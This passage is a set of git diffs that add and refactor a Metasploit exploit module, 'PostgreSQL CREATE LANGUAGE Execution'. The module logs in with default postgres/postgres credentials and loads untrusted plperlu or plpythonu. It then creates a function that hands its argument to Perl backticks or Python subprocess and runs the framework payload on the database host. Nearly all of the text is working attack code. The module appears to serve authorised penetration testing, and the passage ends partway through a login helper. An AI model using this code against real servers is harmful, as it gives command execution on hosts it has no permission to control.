 				To execute system commands, loading the "untrusted" version of the language is necessary.
 				This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
@@ -25,6 +25,8 @@ class Metasploit4 < Msf::Exploit::Remote
 
 				This module attempts to load Perl or Python to execute system  commands. As this dynamically loads
 				a scripting language to execute commands,  it is not necessary to drop a file on the filesystem. 
+
+				Only Postgres 8 and up are supported.
 			},
 			'Author' => [
 				'Micheal Cottingham', # author of this module
@@ -36,16 +38,16 @@ class Metasploit4 < Msf::Exploit::Remote
 				['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
 				['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
 			],
-			'Platform' => %w{python linux unix win osx},
+			'Platform' => %w{linux unix win osx},
 			'Payload' => {
-				'PayloadType' => %w{python cmd}
+				'PayloadType' => %w{cmd}
 			},
-			'Arch' => [ARCH_CMD, ARCH_PYTHON],
+			'Arch' => [ARCH_CMD],
 			'Targets' => [
 				['Automatic', {}]
 			],
 			'DefaultTarget' => 0,
-			'DisclosureDate' => ''
+			'DisclosureDate' => 'January 1 2016'
 		))
 
 		register_options([
@@ -60,7 +62,16 @@ class Metasploit4 < Msf::Exploit::Remote
 		version = postgres_fingerprint
 
 		if version[:auth]
-			return CheckCode::Appears
+			version_match = version[:auth].match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+			major_version = version_match['major_version']
+
+			if major_version.to_i >= 8
+				return CheckCode::Appears
+
+			else
+				print_error 'Unsupported version'
+				return CheckCode::Safe
+			end
 
 		else
 			print_error "Authentication failed. #{version[:preauth] || version[:unknown]}"
@@ -76,193 +87,158 @@ class Metasploit4 < Msf::Exploit::Remote
 			when :noconn; print_error 'Connection failed.'; return
 
 			else
-				print_status("#{rhost}:#{rport} - #{version}")
+				print_status "#{rhost}:#{rport} - #{version}"
 		end
 
+		version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+		major_version = version_match['major_version']
+		extension = 'LANGUAGE'
+
+		if major_version.to_i == 8
+			print_status 'Selecting version 8 payload'
+			extension = 'LANGUAGE'
+
+		elsif major_version.to_i >= 9
+			print_status 'Selecting version 9 payload'
+			extension = 'EXTENSION'
+
+		else
+			print_error 'Unsupported version - exploit failed'
+			return false
+		end
+
+		print_warning 'This exploit does not clean up after itself - you will need to do that manually'
+
+		# Attack!
 		begin
 			func_name = Rex::Text.rand_text_alpha(10)
 
-			load_perl = create_perl
+			languages = %w{perl python python2 python3}
+			loaded = false
+			iter = 0
 
-			# Decision tree - not clean, but it works.
-			# If you have suggestions for improvement, please contact me on Github - @micheal
-			case load_perl
-				when 'exists'
-					print_status 'Perl is already loaded, continuing'
-					createPerlFunc(func_name)
+			languages.each do |language|
+				load_lang = create_language(language, extension)
+				human_language = language.capitalize.to_s
 
-				when 'loaded'
-					print_status 'Perl was successfully loaded, continuing'
-					createPerlFunc(func_name)
+				print_status "Attempting to load #{human_language}"
 
-				when 'not_exists'
-					print_status 'Perl is not installed on the target, attempting Python2'
+				case load_lang
+					when 'exists'
+						print_good "#{human_language} is already loaded, continuing"
+						create_function(language, func_name)
+						loaded = true
 
-					load_python2, ver = create_python2
+					when 'loaded'
+						print_good "#{human_language} was successfully loaded, continuing"
+						create_function(language, func_name)
+						loaded = true
 
-					case load_python2
-						when 'exists'
-							print_status 'Python2 is already loaded, continuing'
-							create_python_func(func_name, '')
+					when 'not_exists'
+						print_status "#{human_language} could not be loaded"
 
-						when 'loaded'
-							print_status 'Python2 was successfully loaded, continuing'
-							create_python_func(func_name, '')
+					else
+						print_error 'No exploit path found'
+						return false
 
-						when 'not_exists'
-							print_status 'Python2 is not installed on the target, attempting Python3'
+				end
 
-							load_python3 = create_python3
-
-							case load_python3
-								when 'exists'
-									print_status 'Python3 is already loaded, continuing'
-									create_python_func(func_name, '3')
-
-								when 'loaded'
-									print_status 'Python3 was successfully loaded, continuing'
-									create_python_func(func_name, '3')
-
-								when 'not_exists'
-									print_error 'No suitable exploit path found, exiting'
-									return
-							end
-					end
+				break if loaded
 			end
 
+			if loaded
+				# Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say
+				# "NoMethodError undefined method `+' for nil:NilClass"
+				# But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal
+				select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
 
-			selectQuery = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
+				case select_query.keys[0]
+					when :conn_error
+						print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
 
-			case selectQuery.keys[0]
-				when :conn_error
-					print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+					when :sql_error
+						print_error "Exploit failed"
+						return false
 
-				when :sql_error
-					print_error "#{rhost}:#{rport} Postgres - #{selectQuery[:sql_error]}"
+					when :complete
+						print_good 'Starting payload'
+				end
 
-				when :complete
-					vprint_good "#{rhost}:#{rport} Postgres - Command complete."
+			else
+				return false
 			end
 
 			rescue RuntimeError => e
-				print_error "Failed to create UDF: #{e.class}: #{e}"
+			 	print_error "Failed to create UDF: #{e.class}: #{e}"
 		end
 
 		postgres_logout if @postgres_conn
 	end
 
-	def create_python2
-		create = postgres_query("CREATE LANGUAGE plpythonasdfu")
+	def create_function(language, func_name)
+		load_func = ''
 
-		if(create.keys[0] == :sql_error)
-			matchExists = create[:sql_error].match(/language "plpythonu" already exists/m)
+		case language
+			when 'perl'
+				load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" +
+					"`$_[0]`;" +
+					"$$ LANGUAGE pl#{language}u")
 
-			if(matchExists)
-				return 'exists', ''
+			# Ruby doesn't do case folding ... :/
+			when 'python'
+				load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" +
+					"import subprocess, shlex\r" +
+					"subprocess.check_output(shlex.split(c))\r" +
+					"$$ LANGUAGE pl#{language}u")
+
+			when 'python2'
+				load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" +
+					"import subprocess, shlex\r" +
+					"subprocess.check_output(shlex.split(c))\r" +
+					"$$ LANGUAGE pl#{language}u")
+
+			when 'python3'
+				load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" +
+					"import subprocess, shlex\r" +
+					"subprocess.check_output(shlex.split(c))\r" +
+					"$$ LANGUAGE pl#{language}u")
 
 			else
-				#matchError = create[:sql_error].match(/could not access file/m)
-				matchError = create[:sql_error].match(/unsupported language/m)
+				print_error 'Invalid language'
+		end
 
-				if(matchError)
-					# One more attempt
-					create2 = postgres_query("CREATE LANGUAGE plpythonu")
+		case load_func.keys[0]
+			when :conn_error
+				print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
 
-					matchError2 = create2[:sql_error].match(/could not access file/m)
+			when :sql_error
+				print_error "#{rhost}:#{rport} Exploit failed"
+				return false
 
-					if(matchError2)
-						return 'not_exists'
-
-					else
-						return 'loaded', '2'
-					end
-				end
-			end
-
-		else
-			return 'loaded', ''
+			when :complete
+				print_good 'Loaded UDF'
 		end
 	end
 
-	def create_python3
-		create = postgres_query("CREATE LANGUAGE plpython3u")
+	def create_language(language, extension)
+		load_language = postgres_query("CREATE #{extension} pl#{language}u")
 
-		if(create.keys[0] == :sql_error)
-			matchExists = create[:sql_error].match(/language "plpython3u" already exists/m)
+		if load_language.keys[0] == :sql_error
+			match_exists = load_language[:sql_error].match(/language "pl#{language}u" already exists/m)
 
-			if(matchExists)
+			if match_exists
 				return 'exists'
 
 			else
-				matchError = create[:sql_error].match(/could not access file/m)
+				match_error = load_language[:sql_error].match(/(could not access file|unsupported language)/m)
 
-				if(matchError)
+				if match_error
 					return 'not_exists'
 				end
 			end
 
 		else
 			return 'loaded'
-		end
-	end
-
-	def create_python_func(name, version)
-		create_python_function = postgres_query(
-				"CREATE OR REPLACE FUNCTION exec_#{name}(c text) RETURNS void as $$" +
-				"import subprocess, shlex" +
-				"return subprocess.check_output(shlex.split(c))" +
-				"$$ LANGUAGE plpython#{version}u")
-
-		case create_python_function.keys[0]
-			when :conn_error
-				print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
-
-			when :sql_error
-				print_error "#{rhost}:#{rport} Postgres - #{create_python_function[:sql_error]}"
-
-			when :complete
-				print_good "#{rhost}:#{rport} Postgres - Command complete."
-		end
-	end
-
-	def create_perl
-		create = postgres_query("CREATE LANGUAGE plasdfu", 50)
-
-		if(create.keys[0] == :sql_error)
-			matchExists = create[:sql_error].match(/language "plperlu" already exists/m)
-
-			if(matchExists)
-				return 'exists'
-
-			else
-				matchError = create[:sql_error].match(/could not access file/m)
-				return 'not_exists'
-
-				if(matchError)
-					return 'not_exists'
-				end
-			end
-
-		else
-			return 'loaded'
-		end
-	end
-
-	def createPerlFunc(name)
-		createPerlFunction = postgres_query(
-				"CREATE OR REPLACE FUNCTION exec_#{name}(text) RETURNS TEXT as $$" +
-						"return `$_[0]`;" +
-						"$$ LANGUAGE plperlu")
-
-		case createPerlFunction.keys[0]
-			when :conn_error
-				print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
-
-			when :sql_error
-				print_error "#{rhost}:#{rport} Postgres - #{createPerlFunction[:sql_error]}"
-
-			when :complete
-				print_good "#{rhost}:#{rport} Postgres - Command complete."
 		end
 	end
 

--- a/modules/exploits/multi/postgres/postgres_createlang.rb
+++ b/modules/exploits/multi/postgres/postgres_createlang.rb
@@ -1,0 +1,301 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/postgres'
+
+class Metasploit4 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::Postgres
+	include Msf::Auxiliary::Report
+
+	# Creates an instance of this module. 
+	def initialize(info = {})
+		super(update_info(info,
+			'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
+			'Description' => %q{
+				Some installations of Postgres are configured to allow loading external  scripting languages.
+				Most commonly this is Perl and  Python. When enabled, command execution is possible  on the host.
+				To execute system commands, loading the "untrusted" version of the language is necessary.
+				This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
+				and has been tested on OS X, Windows, and Linux.
+
+				This module attempts to load Perl or Python to execute system  commands. As this dynamically loads
+				a scripting language to execute commands,  it is not necessary to drop a file on the filesystem. 
+			},
+			'Author' => [
+				'Micheal Cottingham', # author of this module
+				'midnitesnake', # the postgres_payload module that this is based on
+			],
+			'License' => MSF_LICENSE,
+			'References' => [
+				['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
+				['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
+				['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
+			],
+			'Platform' => %w{python linux unix win osx},
+			'Payload' => {
+				'PayloadType' => %w{python cmd}
+			},
+			'Arch' => [ARCH_CMD, ARCH_PYTHON],
+			'Targets' => [
+				['Automatic', {}]
+			],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => ''
+		))
+
+		register_options([
+			OptString.new('USERNAME', [true, 'The username to the service', 'postgres']),
+			OptString.new('PASSWORD', [true, 'The password to the service', 'postgres'])
+		], self.class)
+
+		deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
+	end
+
+	def check
+		version = postgres_fingerprint
+
+		if version[:auth]
+			return CheckCode::Appears
+
+		else
+			print_error "Authentication failed. #{version[:preauth] || version[:unknown]}"
+			return CheckCode::Safe
+		end
+	end
+
+	def exploit
+		version = do_login(username, password, database)
+
+		case version
+			when :noauth; print_error 'Authentication failed.'; return
+			when :noconn; print_error 'Connection failed.'; return
+
+			else
+				print_status("#{rhost}:#{rport} - #{version}")
+		end
+
+		begin
+			func_name = Rex::Text.rand_text_alpha(10)
+
+			load_perl = create_perl
+
+			# Decision tree - not clean, but it works.
+			# If you have suggestions for improvement, please contact me on Github - @micheal
+			case load_perl
+				when 'exists'
+					print_status 'Perl is already loaded, continuing'
+					createPerlFunc(func_name)
+
+				when 'loaded'
+					print_status 'Perl was successfully loaded, continuing'
+					createPerlFunc(func_name)
+
+				when 'not_exists'
+					print_status 'Perl is not installed on the target, attempting Python2'
+
+					load_python2, ver = create_python2
+
+					case load_python2
+						when 'exists'
+							print_status 'Python2 is already loaded, continuing'
+							create_python_func(func_name, '')
+
+						when 'loaded'
+							print_status 'Python2 was successfully loaded, continuing'
+							create_python_func(func_name, '')
+
+						when 'not_exists'
+							print_status 'Python2 is not installed on the target, attempting Python3'
+
+							load_python3 = create_python3
+
+							case load_python3
+								when 'exists'
+									print_status 'Python3 is already loaded, continuing'
+									create_python_func(func_name, '3')
+
+								when 'loaded'
+									print_status 'Python3 was successfully loaded, continuing'
+									create_python_func(func_name, '3')
+
+								when 'not_exists'
+									print_error 'No suitable exploit path found, exiting'
+									return
+							end
+					end
+			end
+
+
+			selectQuery = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
+
+			case selectQuery.keys[0]
+				when :conn_error
+					print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+
+				when :sql_error
+					print_error "#{rhost}:#{rport} Postgres - #{selectQuery[:sql_error]}"
+
+				when :complete
+					vprint_good "#{rhost}:#{rport} Postgres - Command complete."
+			end
+
+			rescue RuntimeError => e
+				print_error "Failed to create UDF: #{e.class}: #{e}"
+		end
+
+		postgres_logout if @postgres_conn
+	end
+
+	def create_python2
+		create = postgres_query("CREATE LANGUAGE plpythonasdfu")
+
+		if(create.keys[0] == :sql_error)
+			matchExists = create[:sql_error].match(/language "plpythonu" already exists/m)
+
+			if(matchExists)
+				return 'exists', ''
+
+			else
+				#matchError = create[:sql_error].match(/could not access file/m)
+				matchError = create[:sql_error].match(/unsupported language/m)
+
+				if(matchError)
+					# One more attempt
+					create2 = postgres_query("CREATE LANGUAGE plpythonu")
+
+					matchError2 = create2[:sql_error].match(/could not access file/m)
+
+					if(matchError2)
+						return 'not_exists'
+
+					else
+						return 'loaded', '2'
+					end
+				end
+			end
+
+		else
+			return 'loaded', ''
+		end
+	end
+
+	def create_python3
+		create = postgres_query("CREATE LANGUAGE plpython3u")
+
+		if(create.keys[0] == :sql_error)
+			matchExists = create[:sql_error].match(/language "plpython3u" already exists/m)
+
+			if(matchExists)
+				return 'exists'
+
+			else
+				matchError = create[:sql_error].match(/could not access file/m)
+
+				if(matchError)
+					return 'not_exists'
+				end
+			end
+
+		else
+			return 'loaded'
+		end
+	end
+
+	def create_python_func(name, version)
+		create_python_function = postgres_query(
+				"CREATE OR REPLACE FUNCTION exec_#{name}(c text) RETURNS void as $$" +
+				"import subprocess, shlex" +
+				"return subprocess.check_output(shlex.split(c))" +
+				"$$ LANGUAGE plpython#{version}u")
+
+		case create_python_function.keys[0]
+			when :conn_error
+				print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+
+			when :sql_error
+				print_error "#{rhost}:#{rport} Postgres - #{create_python_function[:sql_error]}"
+
+			when :complete
+				print_good "#{rhost}:#{rport} Postgres - Command complete."
+		end
+	end
+
+	def create_perl
+		create = postgres_query("CREATE LANGUAGE plasdfu", 50)
+
+		if(create.keys[0] == :sql_error)
+			matchExists = create[:sql_error].match(/language "plperlu" already exists/m)
+
+			if(matchExists)
+				return 'exists'
+
+			else
+				matchError = create[:sql_error].match(/could not access file/m)
+				return 'not_exists'
+
+				if(matchError)
+					return 'not_exists'
+				end
+			end
+
+		else
+			return 'loaded'
+		end
+	end
+
+	def createPerlFunc(name)
+		createPerlFunction = postgres_query(
+				"CREATE OR REPLACE FUNCTION exec_#{name}(text) RETURNS TEXT as $$" +
+						"return `$_[0]`;" +
+						"$$ LANGUAGE plperlu")
+
+		case createPerlFunction.keys[0]
+			when :conn_error
+				print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+
+			when :sql_error
+				print_error "#{rhost}:#{rport} Postgres - #{createPerlFunction[:sql_error]}"
+
+			when :complete
+				print_good "#{rhost}:#{rport} Postgres - Command complete."
+		end
+	end
+
+	# Authenticate to the postgres server. 
+	# Returns the version from #postgres_fingerprint
+	def do_login(user=nil, pass=nil, database=nil)
+		begin
+			password = pass || postgres_password
+
+			vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}")
+
+			result = postgres_fingerprint(
+					:db => database,
+					:username => user,
+					:password => password
+			)
+
+			if result[:auth]
+				report_service(
+						:host => rhost,
+						:port => rport,
+						:name => "postgres",
+						:info => result.values.first
+				)
+				return result[:auth]
+
+			else
+				print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}")
+				return :noauth
+			end
+
+		rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError
+			return :noconn
+		end
+	end
+end

--- a/modules/exploits/multi/postgres/postgres_createlang.rb
+++ b/modules/exploits/multi/postgres/postgres_createlang.rb
@@ -7,271 +7,268 @@ require 'msf/core'
 require 'msf/core/exploit/postgres'
 
 class Metasploit4 < Msf::Exploit::Remote
-	Rank = GoodRanking
+  Rank = GoodRanking
 
-	include Msf::Exploit::Remote::Postgres
-	include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::Postgres
+  include Msf::Auxiliary::Report
 
-	# Creates an instance of this module. 
-	def initialize(info = {})
-		super(update_info(info,
-			'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
-			'Description' => %q{
-				Some installations of Postgres 8 and 9 are configured to allow loading external  scripting languages.
-				Most commonly this is Perl and  Python. When enabled, command execution is possible  on the host.
-				To execute system commands, loading the "untrusted" version of the language is necessary.
-				This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
-				and has been tested on OS X, Windows, and Linux.
+  # Creates an instance of this module.
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
+      'Description' => %q(
+        Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.
+        Most commonly this is Perl and Python. When enabled, command execution is possible on the host.
+        To execute system commands, loading the "untrusted" version of the language is necessary.
+        This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
+        and has been tested on OS X, Windows, and Linux.
 
-				This module attempts to load Perl or Python to execute system  commands. As this dynamically loads
-				a scripting language to execute commands,  it is not necessary to drop a file on the filesystem. 
+        This module attempts to load Perl or Python to execute system commands. As this dynamically loads
+        a scripting language to execute commands, it is not necessary to drop a file on the filesystem.
 
-				Only Postgres 8 and up are supported.
-			},
-			'Author' => [
-				'Micheal Cottingham', # author of this module
-				'midnitesnake', # the postgres_payload module that this is based on
-			],
-			'License' => MSF_LICENSE,
-			'References' => [
-				['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
-				['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
-				['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
-			],
-			'Platform' => %w{linux unix win osx},
-			'Payload' => {
-				'PayloadType' => %w{cmd}
-			},
-			'Arch' => [ARCH_CMD],
-			'Targets' => [
-				['Automatic', {}]
-			],
-			'DefaultTarget' => 0,
-			'DisclosureDate' => 'January 1 2016'
-		))
+        Only Postgres 8 and up are supported.
+      ),
+      'Author' => [
+        'Micheal Cottingham', # author of this module
+        'midnitesnake', # the postgres_payload module that this is based on
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
+        ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
+        ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
+      ],
+      'Platform' => %w(linux unix win osx),
+      'Payload' => {
+        'PayloadType' => %w(cmd)
+      },
+      'Arch' => [ARCH_CMD],
+      'Targets' => [
+        ['Automatic', {}]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jan 1 2016')
+      )
 
-		register_options([
-			OptString.new('USERNAME', [true, 'The username to the service', 'postgres']),
-			OptString.new('PASSWORD', [true, 'The password to the service', 'postgres'])
-		], self.class)
+    register_options([
+      OptString.new('USERNAME', [true, 'The username to the service', 'postgres']),
+      OptString.new('PASSWORD', [true, 'The password to the service', 'postgres'])
+    ], self.class)
 
-		deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
-	end
+    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
+  end
 
-	def check
-		version = postgres_fingerprint
+  def check
+    version = postgres_fingerprint
 
-		if version[:auth]
-			version_match = version[:auth].match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
-			major_version = version_match['major_version']
+    if version[:auth]
+      version_match = version[:auth].match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+      major_version = version_match['major_version']
 
-			if major_version.to_i >= 8
-				return CheckCode::Appears
+      if major_version.to_i >= 8
+        return CheckCode::Appears
 
-			else
-				print_error 'Unsupported version'
-				return CheckCode::Safe
-			end
+      else
+        print_error 'Unsupported version'
+        return CheckCode::Safe
+      end
 
-		else
-			print_error "Authentication failed. #{version[:preauth] || version[:unknown]}"
-			return CheckCode::Safe
-		end
-	end
+    else
+      print_error "Authentication failed. #{version[:preauth] || version[:unknown]}"
+      return CheckCode::Safe
+    end
+  end
 
-	def exploit
-		version = do_login(username, password, database)
+  def exploit
+    version = do_login(username, password, database)
 
-		case version
-			when :noauth; print_error 'Authentication failed.'; return
-			when :noconn; print_error 'Connection failed.'; return
+    case version
+    when :noauth
+      print_error 'Authentication failed.'
+      return
 
-			else
-				print_status "#{rhost}:#{rport} - #{version}"
-		end
+    when :noconn
+      print_error 'Connection failed.'
+      return
 
-		version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
-		major_version = version_match['major_version']
-		extension = 'LANGUAGE'
+    else
+      print_status "#{rhost}:#{rport} - #{version}"
+    end
 
-		if major_version.to_i == 8
-			print_status 'Selecting version 8 payload'
-			extension = 'LANGUAGE'
+    version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+    major_version = version_match['major_version']
+    extension = 'LANGUAGE'
 
-		elsif major_version.to_i >= 9
-			print_status 'Selecting version 9 payload'
-			extension = 'EXTENSION'
+    if major_version.to_i == 8
+      print_status 'Selecting version 8 payload'
+      extension = 'LANGUAGE'
 
-		else
-			print_error 'Unsupported version - exploit failed'
-			return false
-		end
+    elsif major_version.to_i >= 9
+      print_status 'Selecting version 9 payload'
+      extension = 'EXTENSION'
 
-		print_warning 'This exploit does not clean up after itself - you will need to do that manually'
+    else
+      print_error 'Unsupported version - exploit failed'
+      return false
+    end
 
-		# Attack!
-		begin
-			func_name = Rex::Text.rand_text_alpha(10)
+    print_warning 'This exploit does not clean up after itself - you will need to do that manually'
 
-			languages = %w{perl python python2 python3}
-			loaded = false
-			iter = 0
+    # Attack!
+    begin
+      func_name = Rex::Text.rand_text_alpha(10)
 
-			languages.each do |language|
-				load_lang = create_language(language, extension)
-				human_language = language.capitalize.to_s
+      languages = %w(perl python python2 python3)
+      loaded = false
 
-				print_status "Attempting to load #{human_language}"
+      languages.each do |language|
+        load_lang = create_language(language, extension)
+        human_language = language.capitalize.to_s
 
-				case load_lang
-					when 'exists'
-						print_good "#{human_language} is already loaded, continuing"
-						create_function(language, func_name)
-						loaded = true
+        print_status "Attempting to load #{human_language}"
 
-					when 'loaded'
-						print_good "#{human_language} was successfully loaded, continuing"
-						create_function(language, func_name)
-						loaded = true
+        case load_lang
+        when 'exists'
+          print_good "#{human_language} is already loaded, continuing"
+          create_function(language, func_name)
+          loaded = true
 
-					when 'not_exists'
-						print_status "#{human_language} could not be loaded"
+        when 'loaded'
+          print_good "#{human_language} was successfully loaded, continuing"
+          create_function(language, func_name)
+          loaded = true
 
-					else
-						print_error 'No exploit path found'
-						return false
+        when 'not_exists'
+          print_status "#{human_language} could not be loaded"
 
-				end
+        else
+          print_error 'No exploit path found'
+          return false
+        end
 
-				break if loaded
-			end
+        break if loaded
+      end
 
-			if loaded
-				# Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say
-				# "NoMethodError undefined method `+' for nil:NilClass"
-				# But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal
-				select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
+      if loaded
+        # Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say
+        # "NoMethodError undefined method `+' for nil:NilClass"
+        # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal
+        select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
 
-				case select_query.keys[0]
-					when :conn_error
-						print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+        case select_query.keys[0]
+        when :conn_error
+          print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
 
-					when :sql_error
-						print_error "Exploit failed"
-						return false
+        when :sql_error
+          print_error "Exploit failed"
+          return false
 
-					when :complete
-						print_good 'Starting payload'
-				end
+        when :complete
+          print_good 'Starting payload'
+        end
 
-			else
-				return false
-			end
+      else
+        return false
+      end
 
-			rescue RuntimeError => e
-			 	print_error "Failed to create UDF: #{e.class}: #{e}"
-		end
+    rescue RuntimeError => e
+      print_error "Failed to create UDF: #{e.class}: #{e}"
+    end
 
-		postgres_logout if @postgres_conn
-	end
+    postgres_logout if @postgres_conn
+  end
 
-	def create_function(language, func_name)
-		load_func = ''
+  def create_function(language, func_name)
+    load_func = ''
 
-		case language
-			when 'perl'
-				load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" +
-					"`$_[0]`;" +
-					"$$ LANGUAGE pl#{language}u")
+    case language
+    when 'perl'
+      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \
+        "`$_[0]`;" \
+        "$$ LANGUAGE pl#{language}u")
 
-			# Ruby doesn't do case folding ... :/
-			when 'python'
-				load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" +
-					"import subprocess, shlex\r" +
-					"subprocess.check_output(shlex.split(c))\r" +
-					"$$ LANGUAGE pl#{language}u")
+    # Ruby doesn't do case folding ... :/
+    when 'python'
+      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
+        "import subprocess, shlex\r" \
+        "subprocess.check_output(shlex.split(c))\r" \
+        "$$ LANGUAGE pl#{language}u")
 
-			when 'python2'
-				load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" +
-					"import subprocess, shlex\r" +
-					"subprocess.check_output(shlex.split(c))\r" +
-					"$$ LANGUAGE pl#{language}u")
+    when 'python2'
+      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
+        "import subprocess, shlex\r" \
+        "subprocess.check_output(shlex.split(c))\r" \
+        "$$ LANGUAGE pl#{language}u")
 
-			when 'python3'
-				load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" +
-					"import subprocess, shlex\r" +
-					"subprocess.check_output(shlex.split(c))\r" +
-					"$$ LANGUAGE pl#{language}u")
+    when 'python3'
+      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
+        "import subprocess, shlex\r" \
+        "subprocess.check_output(shlex.split(c))\r" \
+        "$$ LANGUAGE pl#{language}u")
 
-			else
-				print_error 'Invalid language'
-		end
+    else
+      print_error 'Invalid language'
+    end
 
-		case load_func.keys[0]
-			when :conn_error
-				print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+    case load_func.keys[0]
+    when :conn_error
+      print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
 
-			when :sql_error
-				print_error "#{rhost}:#{rport} Exploit failed"
-				return false
+    when :sql_error
+      print_error "#{rhost}:#{rport} Exploit failed"
+      return false
 
-			when :complete
-				print_good 'Loaded UDF'
-		end
-	end
+    when :complete
+      print_good 'Loaded UDF'
+    end
+  end
 
-	def create_language(language, extension)
-		load_language = postgres_query("CREATE #{extension} pl#{language}u")
+  def create_language(language, extension)
+    load_language = postgres_query("CREATE #{extension} pl#{language}u")
 
-		if load_language.keys[0] == :sql_error
-			match_exists = load_language[:sql_error].match(/language "pl#{language}u" already exists/m)
+    if load_language.keys[0] == :sql_error
+      match_exists = load_language[:sql_error].match(/language "pl#{language}u" already exists/m)
 
-			if match_exists
-				return 'exists'
+      if match_exists
+        return 'exists'
 
-			else
-				match_error = load_language[:sql_error].match(/(could not access file|unsupported language)/m)
+      else
+        match_error = load_language[:sql_error].match(/(could not access file|unsupported language)/m)
 
-				if match_error
-					return 'not_exists'
-				end
-			end
+        if match_error
+          return 'not_exists'
+        end
+      end
 
-		else
-			return 'loaded'
-		end
-	end
+    else
+      return 'loaded'
+    end
+  end
 
-	# Authenticate to the postgres server. 
-	# Returns the version from #postgres_fingerprint
-	def do_login(user=nil, pass=nil, database=nil)
-		begin
-			password = pass || postgres_password
+  # Authenticate to the postgres server.
+  # Returns the version from #postgres_fingerprint
+  def do_login(user, pass, database)
+    begin
+      password = pass || postgres_password
 
-			vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}")
